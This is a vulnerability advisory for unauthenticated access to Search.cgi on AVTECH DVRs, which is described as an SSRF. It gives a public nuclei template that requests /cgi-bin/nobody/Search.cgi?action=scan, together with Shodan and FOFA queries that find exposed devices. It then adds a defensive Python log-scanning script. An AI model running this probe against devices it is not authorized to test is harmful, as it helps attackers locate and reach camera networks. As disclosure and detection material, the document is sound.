avtech-dvr-ssrf: AVTECH DVR - SSRF

Date: 2025-08-01 | Affected software: AVTECH DVR | POC: public

Vulnerability description

On AVTECH DVR devices, Search.cgi can be accessed directly. Search.cgi is responsible for searching for and accessing cameras on the local network, and it provides the cgi_query function.

PoC code [public]

id: avtech-dvr-ssrf

info:
  name: AVTECH DVR - SSRF
  author: ritikchaddha
  severity: medium
  description: |
    AVTECH DVR device, Search.cgi can be accessed directly. Search.cgi is responsible for searching and accessing cameras in the local network. Search.cgi provides the cgi_query function.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"login" product:"Avtech"
    fofa-query: app="AVTECH-视频监控"
  tags: ssrf,avtech,unauth,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/nobody/Search.cgi?action=scan"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Search.Device'
          - 'Proto='
          - 'IPAddress='
        condition: and

      - type: word
        part: header
        words:
          - text/plain

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008129e0eedf752d8e691ba7330a495676199d932104c48775dec98a15a3dd9677022100b781a3be4d8821304913559b3783339ed61d2cf9d5c5afe859ece74fd38be1b8:922c64590222798bb761d5b6d8e72950
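
For defenders, the same request can be looked for in web access logs. The following is an added example, not part of the original template or of any AVTECH or nuclei code: it assumes a reverse proxy in front of the DVR that writes combined-format access logs, and the log lines, the trusted management host and the function names are all constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines (combined log format) from a hypothetical reverse proxy.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /cgi-bin/nobody/Search.cgi?action=scan HTTP/1.1" 200 412 "-" "curl/8.0"
203.0.113.7 - - [01/Aug/2025:10:00:09 +0000] "GET /cgi-bin/nobody/Search.cgi?action=scan HTTP/1.1" 200 412 "-" "curl/8.0"
198.51.100.23 - - [01/Aug/2025:10:02:11 +0000] "GET /cgi-bin/nobody/%53earch.cgi?action=scan HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Aug/2025:10:03:40 +0000] "GET /cgi-bin/nobody/Search.cgi?action=scan HTTP/1.1" 200 412 "-" "nvr-sync"
198.51.100.23 - - [01/Aug/2025:10:04:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Aug/2025:10:05:00 +0000] "GET /cgi-bin/nobody/Search.cgi?action=scan HTTP/1.1" 403 0 "-" "curl/8.0"
"""

# Assumption: the only host expected to call Search.cgi is a management station.
TRUSTED = frozenset({"192.0.2.10"})

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
TARGET = "/cgi-bin/nobody/search.cgi"  # path from the template, lower-cased


def find_search_cgi_hits(log_text, trusted=frozenset()):
    """Return one record per request to Search.cgi from a non-trusted source."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        src, _method, target, status = m.groups()
        url = urlsplit(target)
        # Percent-decode and case-fold so encoded spellings of the path still match.
        if unquote(url.path).lower() != TARGET or src in trusted:
            continue
        action = parse_qs(url.query).get("action", [""])[0]
        # Status 200 mirrors the template's status matcher: the device answered.
        hits.append({"src": src, "action": action, "answered": status == "200"})
    return hits


def answered_by_source(hits):
    """Count answered requests per source address, for triage."""
    return Counter(h["src"] for h in hits if h["answered"])


if __name__ == "__main__":
    for src, n in answered_by_source(find_search_cgi_hits(SAMPLE_LOG, TRUSTED)).items():
        print(f"{src}: {n} answered Search.cgi request(s)")
```

Any answered request from outside the trusted set means Search.cgi is reachable without authentication from that network segment, which is the exposure the template checks for.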
